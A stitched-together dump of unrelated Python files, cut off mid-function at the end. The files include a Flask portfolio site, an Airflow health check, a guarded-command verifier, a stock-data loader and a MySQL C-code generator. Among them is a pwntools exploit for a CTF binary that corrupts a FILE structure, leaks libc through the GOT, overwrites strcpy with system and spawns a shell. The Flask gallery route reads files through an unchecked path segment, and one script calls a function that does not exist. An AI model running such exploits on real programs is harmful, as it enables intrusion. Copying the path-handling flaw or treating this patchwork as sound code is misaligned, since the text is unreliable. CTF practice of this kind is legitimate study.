return render_template('about.html', locs=fromTo, active='about', scripts=extra_scripts)
@app.route('/projects')
def projects():
fromTo = getLocs(2)
return render_template('projects.html', locs=fromTo, active='projects')
@app.route('/portfolio')
@app.route('/portfolio/gallery')
def portfolio():
fromTo = getLocs(3)
return render_template('portfolio.html', locs=fromTo, active='portfolio')
@app.route('/contact')
def contact():
fromTo = getLocs(4)
return render_template('contact.html', locs=fromTo, active='contact')
# SUB PAGES -------------------------------------
@app.route('/about/why_robots')
def whyRobots():
fromTo = getLocs(1)
crumbs = ['about', 'why_robots']
return render_template('subpages/why_robots.html', locs=fromTo, active='about', crumblist=crumbs)
@app.route('/portfolio/gallery/<gallery>') # dynamic path to different galleries
def gallery(gallery='full'):
fromTo = getLocs(3)
here = os.path.dirname(os.path.abspath(__file__)) # get current directory location
filename = '%s/static/gallery/%s.json' % (here, gallery) # read gallery information in from JSON file
gallery_file = open(filename, 'r') # open and read from JSON file
gallery_text = gallery_file.read()
gallery_file.close()
gallery_dict = json.loads(gallery_text) # parse JSON file as text
extra_scripts = [ # extra scripts to be used with the gallery
'/static/js/gallery.js',
'https://ajax.googleapis.com/ajax/libs/jquery/2.1.4/jquery.min.js'
]
crumbs = ['portfolio', gallery]
return render_template('subpages/gallery.html',
locs=fromTo,
active='portfolio',
gallery=gallery_dict,
css="gallery.css",
crumblist=crumbs,
scripts=extra_scripts)
@app.route('/mobile')
def mobile_redirect():
return render_template('subpages/mobile.html')
# RUN =======================================================================================
if __name__ == '__main__':
app.run(
host = '127.0.0.1',
port = 5000,
debug = True
)
|
while(True):
n = int(input())
if n==0: break
arr = list(map(int,input().split()))
r=d=0
chk=0
ans=0
now=arr[0]
if arr[2]-arr[1] == arr[1]-arr[0]:
d=arr[2]-arr[1]
chk=1
else:
r = arr[2]//arr[1]
chk=2
if chk==1:
for i in range(0,n):
ans+=now
now+=d
else:
for i in range(0,n):
ans+=now
now*=r
print(ans)
|
__author__ = "Ankur Prakash Singh"
# Date format "%m-%d-%Y"
__date__ = '02-20-2020'
"""Max Profit With Transactions"""
|
from datetime import timedelta
from sqlalchemy import func
"""
https://github.com/apache/airflow/blob/16d93c9e45e14179c7822fed248743f0c3fd935c/airflow/www_rbac/views.py#L153
Script that can be used to check if scheduler running correctly as it can sometimes gets stuck
unable to schedule new tasks despite the process looking healthy.
This imitates the logic that exists in the airflow webservers health check endpoint, but runs
locally so it can be used as a simple pod livenessProbe.
Example of usage by a livenessProbe inside a kubernetes pod spec ::
livenessProbe:
exec:
command:
- python3
- /path/to/script/scheduler_health_check.py
periodSeconds: 300
timeoutSeconds: 15
"""
def main():
# Inline the airflow imports because they cause the global config to be loaded
from airflow.utils import timezone
from airflow import jobs
from airflow.configuration import conf
from airflow.settings import configure_orm, Session
configure_orm(disable_connection_pool=True)
base_job_model = jobs.BaseJob
scheduler_health_check_threshold = timedelta(
seconds=conf.getint('scheduler', 'scheduler_health_check_threshold')
)
latest_scheduler_heartbeat = None
try:
latest_scheduler_heartbeat = (
Session.query(func.max(base_job_model.latest_heartbeat))
.filter(base_job_model.state == 'running', base_job_model.job_type == 'SchedulerJob')
.scalar()
)
except Exception:
pass
if not latest_scheduler_heartbeat:
status_code = 1
else:
if timezone.utcnow() - latest_scheduler_heartbeat <= scheduler_health_check_threshold:
status_code = 0
else:
status_code = 1
return status_code
if __name__ == "__main__":
exit(main())
|
from pwn import *
context(arch='amd64',os='linux',log_level='debug')
sl = lambda x:io.sendline(x)
s = lambda x:io.send(x)
rn = lambda x:io.recv(x)
ru = lambda x:io.recvuntil(x, drop=True)
r = lambda :io.recv()
it = lambda: io.interactive()
success = lambda x:log.success(x)
binary = './task_magic'
io = process(binary)
def debug():
gdb.attach(io)
raw_input()
def create(name):
ru('choice>> ')
sl('1')
ru('name:')
s(name)
def spell(index, data):
ru('choice>> ')
sl('2')
ru('spell:')
sl(str(index))
ru('name:')
s(data)
def final(index):
ru('choice>> ')
sl('3')
ru('chance:')
sl(str(index))
puts_got = 0x602020
strcpy_got = 0x602090
create('xxx')
spell(0, '/bin/sh\x00')
for _ in range(12):
spell(-2, '\x00')
spell(-2, '\x00'*30)
spell(-2, '\x00')
spell(0, '\x00\x00' + p64(0xfbad24a8))
spell(0, p64(puts_got) + p64(puts_got+0x60))
puts_address = u64(rn(8))
success("puts address: 0x%x" %(puts_address))
libc_base = puts_address - 0x6f690
success("libc base: 0x%x" %(libc_base))
sys_address = libc_base + 0x45390
success("system address: 0x%x" %(sys_address))
spell(0, p64(0)*2)
spell(0, p64(strcpy_got)+p64(strcpy_got+0x100)+p64(strcpy_got+50))
spell(-2, '\x00')
spell(0, p64(sys_address))
spell(0, "/bin/sh\x00")
it() |
import cv2 as cv
import numpy as np
if __name__ == '__main__':
img = cv.imread('imagem.png')
imgGray = cv.cvtColor(img,cv.COLOR_BGR2GRAY)
retval, imgOTSU = cv.threshold(imgGray,0,255,cv.THRESH_OTSU)
kernel = cv.getStructuringElement(cv.MORPH_RECT,(1,3))
for i in range(5):
imgErode = cv.erode(imgOTSU,kernel,iterations=i)
cv.imshow('imgDilate', imgErode)
cv.waitKey(1000)
cv.imshow('Gray',imgGray)
cv.imshow('ImgOTSU',imgOTSU)
cv.waitKey(0) |
from dataclasses import dataclass
import dataclasses
from functools import reduce
from gclang.gen.GuardedVisitor import GuardedVisitor
import sympy as sp
from gclang.guarded_exception import GuardedException
from ..gen.GuardedParser import GuardedParser
def compose(*fns):
return reduce(lambda f, g: lambda x: f(g(x)), fns, lambda x: x)
@dataclasses.dataclass
class Function:
parameters: list[str]
body: GuardedParser.OperatorListContext
class ReverseVisitor(GuardedVisitor):
def __init__(self):
self._functions = {}
self._replacement_stack = []
self._predicate_stack = []
self._depth = 1
self._claims = []
self._replace = True
def visitTrue(self, ctx):
return sp.true
def visitFalse(self, ctx):
return sp.false
def visitIdentifier(self, ctx: GuardedParser.IdentifierContext):
identifier = sp.Symbol(ctx.getText())
if self._replace and self._replacement_stack and identifier in self._replacement_stack[-1]:
return sp.Symbol('local ' + str(self._replacement_stack[-1][identifier]))
return identifier
def visitNumber(self, ctx: GuardedParser.NumberContext):
return sp.Number(ctx.getText())
def visitUnarySub(self, ctx: GuardedParser.UnarySubContext):
return -self.visit(ctx.getChild(0, GuardedParser.ExpressionContext))
def visitNegate(self, ctx: GuardedParser.NegateContext):
return sp.Not(self.visit(ctx.getChild(0, GuardedParser.ExpressionContext)))
def visitAnd(self, ctx: GuardedParser.AndContext):
left, right = [self.visit(node) for node in ctx.getTypedRuleContexts(
GuardedParser.ExpressionContext)]
return sp.And(left, right)
def visitOr(self, ctx: GuardedParser.OrContext):
left, right = [self.visit(node) for node in ctx.getTypedRuleContexts(
GuardedParser.ExpressionContext)]
return sp.Or(left, right)
def visitImpl(self, ctx: GuardedParser.ImplContext):
left, right = [self.visit(node) for node in ctx.getTypedRuleContexts(
GuardedParser.ExpressionContext)]
return sp.Or(sp.Not(left), right)
def visitExprMacroCall(self, ctx: GuardedParser.ExprMacroCallContext):
function_name = ctx.getToken(GuardedParser.ID, 0).getText()
parameters_ctx = ctx.getChild(
0, GuardedParser.ActualParametersContext)
parameters = [self.visit(node) for node in parameters_ctx.getTypedRuleContexts(
GuardedParser.ExpressionContext
)]
return sp.Function(function_name)(*parameters)
def visitLogic(self, ctx: GuardedParser.LogicContext):
left, right = [self.visit(node) for node in ctx.getTypedRuleContexts(
GuardedParser.ExpressionContext)]
return {
ctx.LT(): lambda x, y: sp.Lt(x, y),
ctx.LE(): lambda x, y: sp.Le(x, y),
ctx.GT(): lambda x, y: sp.Gt(x, y),
ctx.GE(): lambda x, y: sp.Ge(x, y),
ctx.EQ(): lambda x, y: sp.Eq(x, y),
ctx.NEQ(): lambda x, y: sp.Not(sp.Eq(x, y)),
}[ctx.getChild(1)](left, right)
def visitAddSub(self, ctx: GuardedParser.AddSubContext):
left, right = [self.visit(node) for node in ctx.getTypedRuleContexts(
GuardedParser.ExpressionContext)]
return {
ctx.ADD(): lambda x, y: sp.Add(x, y),
ctx.SUB(): lambda x, y: sp.Add(x, sp.Mul(-1, y)),
}[ctx.getChild(1)](left, right)
def visitMulDiv(self, ctx: GuardedParser.MulDivContext):
left, right = [self.visit(node) for node in ctx.getTypedRuleContexts(
GuardedParser.ExpressionContext)]
return {
ctx.MUL(): lambda x, y: sp.Mul(x, y),
ctx.DIV(): lambda x, y: sp.Mul(x, sp.Pow(y, -1)),
}[ctx.getChild(1)](left, right)
def visitAssignOperator(self, ctx: GuardedParser.AssignOperatorContext):
var_names = list(map(str, ctx.getTokens(GuardedParser.ID)))
var_values = [self.visit(node) for node in ctx.getTypedRuleContexts(
GuardedParser.ExpressionContext)]
old_condition = self._predicate_stack.pop()
if ctx.getTokens(GuardedParser.LOCAL_VARIABLE):
local_vars = map(compose(sp.Symbol, lambda v: 'local ' + v), var_names)
new_condition = old_condition.xreplace(dict(zip(local_vars, var_values)))
else:
vars, local_vars = map(sp.Symbol, var_names), map(compose(sp.Symbol, lambda v: 'local ' + v), var_names)
new_condition = old_condition.xreplace(
dict(zip(local_vars, var_values)) | dict(zip(vars, var_values))
)
print(' ' * self._depth +
f'{old_condition} --[assign {list(var_names)}:={var_values}]--> {new_condition}')
self._predicate_stack.append(new_condition)
def visitIfOperator(self, ctx: GuardedParser.AssignOperatorContext):
command_list_ctx = ctx.getChild(0, GuardedParser.CommandListContext)
commands = command_list_ctx.getTypedRuleContexts(
GuardedParser.CommandContext)
predicate = self._predicate_stack.pop()
@dataclass
class Command:
fuse: sp.Basic
predicate: sp.Basic
command_predicates: list[Command] = []
for command in commands:
fuse = self.visit(command.getChild(
0, GuardedParser.ExpressionContext))
body = command.getChild(0, GuardedParser.OperatorListContext)
self._predicate_stack.append(predicate)
self.visitOperatorList(body)
new_predicate = self._predicate_stack.pop()
command_predicates.append(
Command(fuse=fuse, predicate=new_predicate))
BB = reduce(
sp.Or, [c.fuse for c in command_predicates], sp.false)
R = reduce(
sp.And, [sp.Implies(c.fuse, c.predicate) for c in command_predicates], sp.true)
new_predicate = sp.And(BB, R)
print(' ' * self._depth +
f'{str(predicate)} --[if]--> {str(new_predicate)}')
self._predicate_stack.append(new_predicate)
def visitDoOperator(self, ctx: GuardedParser.DoOperatorContext):
condition = ctx.getChild(0, GuardedParser.ConditionContext)
if condition == None:
raise GuardedException(ctx.start.line, "do..od operator without invariant in deriving mode")
invariant = self.visitCondition(condition)
old_predicate = self._predicate_stack.pop()
self._predicate_stack.append(invariant)
command_list_ctx = ctx.getChild(0, GuardedParser.CommandListContext)
commands = command_list_ctx.getTypedRuleContexts(
GuardedParser.CommandContext)
R = reduce(
sp.And,
map(compose(sp.Not, self.visit), [c.getChild(
0, GuardedParser.ExpressionContext) for c in commands]),
invariant
)
claim_predicate = sp.Implies(
R.simplify(), old_predicate)
self._claims.append(str(claim_predicate))
def visitOperatorList(self, ctx: GuardedParser.OperatorListContext):
for operator in reversed(list(ctx.getChildren())):
self.visitOperator(operator)
def visitStart(self, ctx: GuardedParser.StartContext):
for function_definition in ctx.getTypedRuleContexts(GuardedParser.MacroOperatorDefinitionContext):
self.visit(function_definition)
post_condition_ctx = ctx.getChild(0, GuardedParser.ConditionContext)
if post_condition_ctx == None:
raise GuardedException(ctx.start.line, 'Post-condition not found')
post_condition = self.visitCondition(post_condition_ctx)
self._predicate_stack.append(post_condition)
print('Post-condition:', str(post_condition))
self.visitChildren(ctx)
pre_condition = sp.simplify(self._predicate_stack.pop())
print('Pre-condition:', str(pre_condition.simplify()))
self._claims and print(
'\nPROVE manually, that following formulas are tauthologies:')
for i in range(len(self._claims)):
print(f'{i + 1}. {self._claims[i]}')
def visitCondition(self, ctx: GuardedParser.ConditionContext):
return self.visit(ctx.getChild(0, GuardedParser.ExpressionContext))
def visitInitialAssignments(self, ctx: GuardedParser.InitialAssignmentsContext):
pass
def visitMacroOperatorDefinition(self, ctx: GuardedParser.MacroOperatorDefinitionContext):
function_name = ctx.getChild(0).getText()
function_params = ctx.getChild(0, GuardedParser.FormalParametersContext)
params = map(compose(sp.Symbol, str), function_params.getTokens(GuardedParser.ID))
body = ctx.getChild(0, GuardedParser.OperatorListContext)
self._functions[function_name] = Function(list(params), body)
def visitMacroCall(self, ctx: GuardedParser.MacroCallContext):
function_name = ctx.getToken(GuardedParser.ID, 0).getText()
params_ctx = ctx.getChild(0, GuardedParser.ActualParametersContext)
function = self._functions[function_name]
self._replace = False
params = [self.visit(node) for node in params_ctx.getTypedRuleContexts(
GuardedParser.ExpressionContext)]
self._replace = True
self._replacement_stack.append(dict(zip(function.parameters, params)))
self.visitOperatorList(function.body)
self._replacement_stack.pop()
def visitBrackets(self, ctx: GuardedParser.BracketsContext):
return self.visit(ctx.getTypedRuleContext(GuardedParser.ExpressionContext, 0))
|
import datetime
import tushare as ts
from app_registry import appRegistry as ar
from model.m_area import MArea
from model.m_industry import MIndustry
from model.m_stock import MStock
from model.m_user_stock import MUserStock
from model.m_stock_daily import MStockDaily
from util.app_util import AppUtil
'''
获取沪深两市所有挂牌股票基本信息,并保存到数据库中
'''
class CStock(object):
def __init__(self):
self.name = 'CStock'
@staticmethod
def get_stocks():
''' 获取市场上所有挂牌股票基本信息 '''
ts.set_token(ar.ts_token)
pro = ts.pro_api()
data = pro.stock_basic(exchange='', list_status='L',
fields='ts_code,symbol,name,area,industry,list_date')
rec_nums = data.shape[0]
for j in range(rec_nums):
rec = list(data.ix[rec_nums - 1 - j])
flds = []
area_id = CStock.process_area(rec[3])
industry_id = CStock.process_industry(rec[4])
stock_id = CStock.process_stock(rec[0], rec[1], rec[2],
area_id, industry_id, rec[5])
print('^_^ End caller={0}'.format(ar.caller))
@staticmethod
def process_area(area_name):
'''
处理地区信息:如果地区不存在添加到数据库表中,如果存在
则求出其area_id
'''
area_id = MArea.get_area_id_by_name(area_name)
if area_id>0:
print('地区存在:{0}'.format(area_name))
else:
area_id = MArea.add_area(area_name)
print('添加地区:{0}---{1}'.format(area_id, area_name))
return area_id
@staticmethod
def process_industry(industry_name):
'''
处理行业信息:如果行业不存在则添加表数据库表中,如果
存在则返回industry_id
'''
industry_id = MIndustry.get_industry_id_by_name(industry_name)
if industry_id>0:
print('行业存在:{0}'.format(industry_name))
else:
industry_id = MIndustry.add_industry(industry_name)
print('添加行业:{0}---{1}'.format(industry_id, industry_name))
return industry_id
@staticmethod
def process_stock(ts_code, symbol, stock_name, area_id,
industry_id, list_date):
'''
处理股票基本信息:如果股票不存在则添加到数据库中,如果存在
则返回股票编号
'''
stock_id = MStock.get_stock_id_by_name(stock_name)
if stock_id > 0:
print('股票存在:{0}'.format(stock_name))
else:
stock_id = MStock.add_stock(ts_code, symbol,
stock_name, area_id, industry_id, list_date)
print('添加股票:{0}---{1}'.format(stock_id, stock_name))
return stock_id
@staticmethod
def get_user_stock_hold(user_stock_id):
'''
获取指定用户当前指定股票的持有量
@param user_stock_id:用户股票组合编号,可以通过user_id和stock_id求出
@return 股票持有量
@version v0.0.1 闫涛 2019-03-04
'''
rc, rows = MUserStock.get_user_stock_hold(user_stock_id)
if rc <= 0:
return 0
else:
return rows[0][0]
@staticmethod
def get_prev_day_close_price(ts_code, curr_date):
'''
获取前一天股票的收盘价,如果前一天是非交易日,则循环向前取,直到
产易日为止
@param curr_date:当前日期,格式为20190304
@return 前一交易日的收盘价(以分为单位)
@version v0.0.1 闫涛 2019-03-05
'''
prev_date = AppUtil.get_delta_date(curr_date, delta=-1)
curr_date = prev_date
rc, rows = MStockDaily.get_close(ts_code, prev_date)
while rc <= 0:
prev_date = AppUtil.get_delta_date(curr_date, delta=-1)
curr_date = prev_date
rc, rows = MStockDaily.get_close(ts_code, prev_date)
print('处理日期:{0}; rc={1}'.format(prev_date, rc))
return rows[0][0]
@staticmethod
def get_stock_vo_of_user(user_stock_id):
'''
通过用户持股代码查询股票基本信息
@param user_stock_id:用户持股编号
@return 股票基本信息
@version v0.0.1 闫涛 2019-03-05
'''
rc, rows = MUserStock.get_stock_vo(user_stock_id)
if rc <= 0:
return []
else:
return rows[0]
@staticmethod
def get_stock_vo_by_id(stock_id):
'''
通过股票编号查询股票基本信息
@param stock_id:股票编号
@return 若存在返回:股票编码、股票代码、股票名称
@version v0.0.1 闫涛 2019-03-06
'''
rc, rows = MStock.get_stock_vo_by_id(stock_id)
if rc <= 0:
return []
else:
return rows[0]
@staticmethod
def get_stock_id_by_ts_code(ts_code):
'''
根据ts_code求出股票编号stock_id
@param ts_code:股票编码
@return stock_id
@version v0.0.1 闫涛 2019-03-06
'''
rc, rows = MStock.get_stock_id_by_ts_code(ts_code)
if rc <= 0:
return 0
else:
return rows[0][0]
|
import random
def make_lst():
count = int(input("How many numbers do you need? "))
lowest = int(input("What's the lowest number? "))
upper = int(input("What's the highest number? ")) + 1
lst=[]
for i in range (0,count):
lst.append(random.randrange(lowest,upper))
return lst
print(make_list()) |
#!/usr/bin/python
# Copyright (c) 2009 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
This tool creates a tarball with all the sources, but without .svn directories.
It can also remove files which are not strictly required for build, so that
the resulting tarball can be reasonably small (last time it was ~110 MB).
Example usage (make sure gclient is in your PATH):
export_tarball.py /foo/bar
The above will create file /foo/bar.tar.bz2.
"""
from __future__ import with_statement
import contextlib
import optparse
import os
import shutil
import subprocess
import sys
import tarfile
import tempfile
def RunCommand(argv):
"""Runs the command with given argv and returns exit code."""
try:
proc = subprocess.Popen(argv, stdout=None)
except OSError:
return 1
output = proc.communicate()[0]
return proc.returncode
def main(argv):
parser = optparse.OptionParser()
parser.add_option("--remove-nonessential-files",
dest="remove_nonessential_files",
action="store_true", default=False)
options, args = parser.parse_args(argv)
if len(args) != 1:
print 'You must provide only one argument: output file name'
print '(without .tar.bz2 extension).'
return 1
output_fullname = args[0] + '.tar.bz2'
output_basename = os.path.basename(args[0])
target_dir = tempfile.mkdtemp()
try:
if RunCommand(['gclient', 'export', target_dir]) != 0:
print 'gclient failed'
return 1
if options.remove_nonessential_files:
nonessential_dirs = (
'src/chrome/test/data',
'src/chrome/tools/test/reference_build',
'src/gears/binaries',
'src/net/data/cache_tests',
'src/o3d/documentation',
'src/o3d/samples',
'src/third_party/lighttpd',
'src/third_party/WebKit/LayoutTests',
'src/webkit/data/layout_tests',
'src/webkit/tools/test/reference_build',
)
for dir in nonessential_dirs:
path = os.path.join(target_dir, dir)
try:
print 'removing %s...' % dir
shutil.rmtree(path)
except OSError, e:
print 'error while trying to remove %s, skipping' % dir
with contextlib.closing(tarfile.open(output_fullname, 'w:bz2')) as archive:
archive.add(os.path.join(target_dir, 'src'), arcname=output_basename)
finally:
shutil.rmtree(target_dir)
return 0
if __name__ == "__main__":
sys.exit(main(sys.argv[1:]))
|
#!/usr/bin/python
from sys import *
def generic_istream(filename):
#print >> stderr,"opening ",filename
if filename=="-":
return sys.stdin
else:
return open(filename)
def printUsageAndExit(programName):
print >> stderr,programName,"fastafile > outfile"
exit()
def softMaskToHardMaskSeq(seq):
nseq=""
for s in seq:
if s.islower():
nseq+="N"
else:
nseq+=s
return nseq
if __name__=="__main__":
programName=argv[0]
args=argv[1:]
try:
filename,=args
except:
printUsageAndExit(programName)
fil=generic_istream(filename)
for lin in fil:
lin=lin.strip()
if len(lin)<1:
continue
if lin[0]!=">": #header ignore
lin=softMaskToHardMaskSeq(lin) #convert soft to hard
print >> stdout,lin
fil.close()
|
from typing import List
from sql_types import SqlType, SqlColumn
from function import FunctionTemplate, MacroDefinition
class Prop:
def __init__(self, name: str, proptype: SqlColumn):
self.name = name
self.proptype = proptype
class Struct:
def __init__(self, name: str, columns: List[SqlColumn]):
# assert columns[0].proptype == SqlType.PK_LONG
self.members = columns
self.name = name
self.typedef_name = name.upper()
self.enum_name = name.upper() + "_E"
self.methods: List[FunctionTemplate] = []
def __getitem__(self, key) -> SqlColumn:
return self.members[key]
def __setitem__(self, key, value):
self.members[key] = value
def __str__(self):
out = ""
out += "struct {name} {{\n".format(name=self.name)
out += "".join(["\t" + self.format_prop(prop) + "\n" for prop in self.members])
out += "};\n\n"
out += "typedef struct {name} {typedef};\n\n".format(name=self.name, typedef=self.typedef_name)
return out
def __repr__(self) -> str:
out = ""
for prop in self.members:
out += "{:10} : {}\n".format(prop.name, prop.proptype)
return out
@staticmethod
def format_prop(prop: SqlColumn):
"""
Formats the struct memeber for generating header files.
"""
if prop.proptype == SqlType.VARCHAR:
return "char {name}[{size}];".format(name=prop.name, size=prop.size)
elif prop.proptype == SqlType.TEXT:
return "char {name}[{size}];".format(name=prop.name, size=prop.size)
elif prop.proptype == SqlType.PK_LONG:
return "uint {name};".format(name=prop.name)
elif prop.proptype == SqlType.FK_LONG:
return "struct {name}* {name};".format(name=prop.name.replace("_id", "").replace("id_", ""))
elif prop.proptype == SqlType.LONG:
return "uint {name};".format(name=prop.name)
elif prop.proptype == SqlType.DATE:
return "struct tm {name};".format(name=prop.name)
else:
msg = f"SQL type not handled '{prop}'"
assert False, msg
def col_count(self):
"""
Returns the number of columns.
"""
return len(self.members)
def param_count(self):
"""
Returns the number of columns excluding Primary Key.
"""
return len(self.members) - 1
def get_col_buffer_definitions(self):
"""
Defines buffers which are used for SQL Result set binding.
"""
out = "/* Generated using get_col_buffer_definitions()*/\n"
out += """unsigned long lengths[RES_COL_COUNT];
my_bool is_null[RES_COL_COUNT];
my_bool error[RES_COL_COUNT];\n"""
for prop in self.members:
out += "\t"
if prop.proptype in [SqlType.VARCHAR, SqlType.DATE, SqlType.TEXT]:
out += "char {col}_buffer[{size}];\n".format(col=prop.name, size=prop.size)
elif prop.proptype in [SqlType.LONG, SqlType.FK_LONG, SqlType.PK_LONG]:
out += "uint {col}_buffer;\n".format(col=prop.name)
return out
def get_buffer_bindings(self):
"""
Generates binding for every struct member in the query. Buffers to which members are bound
must be defined with get_col_buffer_definitions().
"""
out = "/* Generated using get_buffer_bindings()*/\n"
out += "MYSQL_BIND param[RES_COL_COUNT];\n"
out += "memset(param, 0, sizeof(param));\n"
for i, prop in enumerate(self.members):
out += self.bind_prop_buffer(i, prop)
return out
@staticmethod
def bind_prop_buffer(index, prop):
"""
Generates code that binds parameter structs memembers to predefined stack allocated buffers.
Buffers must be defined with get_col_buffer_definitions().
"""
out = """
/* {type} COLUMN */
param[{index}].buffer_type = {mysql_type};
param[{index}].buffer = &{name}_buffer;
param[{index}].is_null = &is_null[{index}];
param[{index}].length = &lengths[{index}];
param[{index}].error = &error[{index}];
"""
reg_type = None
mysql_type = None
if prop.proptype in [SqlType.VARCHAR, SqlType.TEXT]:
reg_type = "STRING"
mysql_type = "MYSQL_TYPE_STRING"
out += "param[{index}].buffer_length = {len};\n".format(index=index, len=prop.size)
elif prop.proptype == SqlType.DATE:
reg_type = "DATE"
mysql_type = "MYSQL_TYPE_STRING"
out += "param[{index}].buffer_length = BUFFER_SIZE;\n"
elif prop.proptype in [SqlType.LONG, SqlType.FK_LONG, SqlType.PK_LONG]:
reg_type = "INTEGER"
mysql_type = "MYSQL_TYPE_LONG"
else:
msg = f"SQL type not handled '{prop}'"
assert False, msg
assert reg_type is not None
assert mysql_type is not None
return out.format(index=index, type=reg_type, mysql_type=mysql_type, name=prop.name)
def col_fetch(self):
"""
Generates part of the code responsible for looping over results fetched from
executing the SQL statement. Respective buffers must be defined and bound.
"""
cols = ""
for i, prop in enumerate(self.members):
if prop.proptype in [SqlType.VARCHAR, SqlType.TEXT]:
cols += """
if (is_null[{index}]) {{
strcpy((({name}*) row->data)->{col}, "NULL");
}} else {{
strncpy((({name}*) row->data)->{col}, {col}_buffer, lengths[{index}]);
}}""".format(index=i, col=prop.name, name=self.typedef_name)
elif prop.proptype == SqlType.DATE:
cols += """
if (is_null[{index}]) {{
// strcpy((({name}*) row->data)->{col}, "NULL");
}} else {{
mysql_timecpystr(&(({name}*) row->data)->{col}, {col}_buffer);
}}""".format(index=i, col=prop.name, name=self.typedef_name)
elif prop.proptype in [SqlType.LONG, SqlType.PK_LONG]:
cols += """
if (is_null[{index}]) {{
(({name}*) row->data)->{col} = 0;
}} else {{
(({name}*) row->data)->{col} = {col}_buffer;
}}""".format(index=i, col=prop.name, name=self.typedef_name)
elif prop.proptype == SqlType.FK_LONG:
cols += """
if (is_null[{index}]) {{
(({name}*) row->data)->{col_name} = NULL;
}} else {{
(({name}*) row->data)->{col_name} = {col_name}_find_by_id(conn, {col}_buffer);
}}""".format(index=i, col=prop.name, col_name=prop.name.replace("_id", "").replace("id_", ""),
name=self.typedef_name)
else:
msg = f"SQL type not handled '{prop}'"
assert False, msg
return """
/* Generated using col_fetch()*/
while (!mysql_stmt_fetch(stmt)) {{
res->count++;
row = calloc(1, sizeof(struct sql_result_row));
if (res->results == NULL) {{
res->results = row;
}} else {{
curr = res->results;
while (curr->next != NULL) {{
curr = curr->next;
}}
curr->next = row;
}}
row->data = calloc(1, sizeof({struct_name}));
{cols}
}}""".format(cols=cols, struct_name=self.name.upper())
def get_col_param_buffers(self):
"""
Generates buffers for all available struct members.
"""
out = "/* Generated using get_col_param_buffers() */\n"
for i, prop in enumerate(self.members):
if i == 0:
continue
out += self.col_param_from_prop(i - 1, prop, self.name)
return out
def get_col_param_buffer(self, props: List[str]):
"""
Generates buffers for the selected struct members.
"""
members = []
for mem in self.members:
if mem.name in props:
members.append(mem)
out = "/* Generated using get_col_param_buffers() */\n"
out += "MYSQL_BIND param[PARAM_COUNT];\n"
out += "memset(param, 0, sizeof(param));\n"
for i, prop in enumerate(members):
out += self.col_param_from_prop(i, prop, self.name)
return out
@staticmethod
def col_param_from_prop(num, prop, name):
"""
Allocates respective param buffers that store struct data used in the SQL Query.
Buffers are used in queries such as 'UPDATE' or 'INSERT'
Example:
/* STRING PARAM */
param[1].buffer = malloc(name_len);
param[1].buffer_type = MYSQL_TYPE_STRING;
param[1].buffer_length = name_len;
strncpy(param[1].buffer, libraryT->name, name_len);
Make sure to free buffers using col_param_buffer_free().
"""
out = """
/* {type} PARAM */
param[{index}].buffer = malloc({buffer_size});
param[{index}].buffer_type = {mysql_type};
"""
reg_type = None
mysql_type = None
buffer_size = None
if prop.proptype in [SqlType.VARCHAR, SqlType.TEXT]:
reg_type = "STRING"
mysql_type = "MYSQL_TYPE_STRING"
buffer_size = "{col}_len".format(col=prop.name)
out += """param[{index}].buffer_length = {col}_len;
strncpy(param[{index}].buffer, {name}T->{col}, {col}_len);"""
elif prop.proptype in [SqlType.LONG, SqlType.PK_LONG]:
reg_type = "INTEGER"
mysql_type = "MYSQL_TYPE_LONG"
buffer_size = "sizeof(uint)"
out += "memcpy(param[{index}].buffer, &{name}T->{col}, {buffer_size});"
elif prop.proptype == SqlType.FK_LONG:
reg_type = "INTEGER"
mysql_type = "MYSQL_TYPE_LONG"
buffer_size = "sizeof(uint)"
out += "memcpy(param[{index}].buffer, &{name}T->{col_fk}->{col}, {buffer_size});"
elif prop.proptype == SqlType.DATE:
reg_type = "DATE"
mysql_type = "MYSQL_TYPE_DATE"
buffer_size = "{}".format(prop.size)
out += "mysql_timecpy(param[{index}].buffer, &{name}T->{col});"
else:
msg = f"SQL type not handled '{prop}'"
assert False, msg
assert reg_type is not None
assert mysql_type is not None
assert buffer_size is not None
return out.format(index=num, type=reg_type, mysql_type=mysql_type, col=prop.name, name=name,
buffer_size=buffer_size, col_fk=prop.name.replace("_id", "").replace("id_", ""))
def col_param_buffer_free(self, num: int = None):
"""
Frees allocated param buffers after use.
"""
out = "/* Generated using col_param_buffer_free() */\n"
if num is None:
for i in range(self.param_count()):
out += "free(param[{index}].buffer);\n".format(index=i)
else:
for i in range(num):
out += "free(param[{index}].buffer);\n".format(index=i)
return out
def col_buffer_free(self, num: int = None):
"""
Frees allocated param buffers after use.
"""
out = "/* Generated using col_buffer_free() */\n"
if num is None:
for i in range(self.col_count()):
out += "free(param[{index}].buffer);\n".format(index=i)
else:
for i in range(num):
out += "free(param[{index}].buffer);\n".format(index=i)
return out
def get_update_fk(self):
"""
Updates Foreign Key references in 'UPDATE' or 'INSERT' methods.
"""
out = "/* Generated using get_update_fk() */\n"
for prop in self.members:
if prop.proptype == SqlType.FK_LONG:
out += """
if ({name}T->{fk_name} == NULL){{
fprintf(stderr, "%s->%s is NULL\\n", "{name}", "{fk_name}");
return 0U;
}} else if ({name}T->{fk_name}->{fk_id} == 0) {{
{fk_name}_insert(conn, {name}T->{fk_name});
}} else {{
{fk_name}_update(conn, {name}T->{fk_name});
}}""".format(name=self.name, fk_name=prop.name.replace("_id", "").replace("id_", ""), fk_id=prop.name)
return out
def col_param_lengths(self, func_ref: FunctionTemplate):
"""
Defines '#define' preprocessor directives and stack variables specifying sizes of column fields.
"""
out = "/* Generated using col_param_lengths() */\n"
out += "MYSQL_BIND param[PARAM_COUNT];\n"
out += "memset(¶m, 0, sizeof(param));\n"
for prop in self.members:
if prop.proptype in [SqlType.VARCHAR, SqlType.TEXT]:
out += self.col_param_length(prop, func_ref)
return out
def col_param_length(self, prop, func_ref: FunctionTemplate):
"""
Defines '#define' preprocessor directive and stack variable specifying size of the column field.
"""
func_ref.add_macro_def(
MacroDefinition("{name_upper}_SIZE".format(name_upper=prop.name.upper()), str(prop.size)))
return """
unsigned long {name}_len;
{name}_len = strnlen({struct}T->{name}, {name_upper}_SIZE);
""".format(name=prop.name, name_upper=prop.name.upper(), struct=self.name)
def col_update_params(self, func_ref: FunctionTemplate):
"""
Allocates and bind param buffers used in execute methods.
Be sure to free allocated buffers with col_param_buffer_free().
"""
out = "/* Generated using col_update_params() */\n"
out += "MYSQL_BIND param[PARAM_COUNT];\n"
out += "memset(¶m, 0, sizeof(param));\n"
memb = self.members.copy()
memb.append(memb.pop(0))
for prop in memb:
